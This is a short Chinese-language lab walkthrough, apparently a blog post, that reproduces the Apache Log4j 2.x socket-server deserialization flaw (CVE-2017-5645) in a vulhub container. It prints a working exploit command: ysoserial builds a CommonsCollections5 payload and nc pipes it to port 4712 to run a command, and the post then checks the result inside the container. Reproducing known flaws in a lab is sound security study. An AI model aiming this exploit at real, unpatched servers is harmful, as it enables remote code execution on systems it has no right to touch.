vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)_第1张图片

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)_第2张图片

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)_第3张图片

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)_第4张图片


 

你可能感兴趣的:(vulhub漏洞复现,apache,log4j)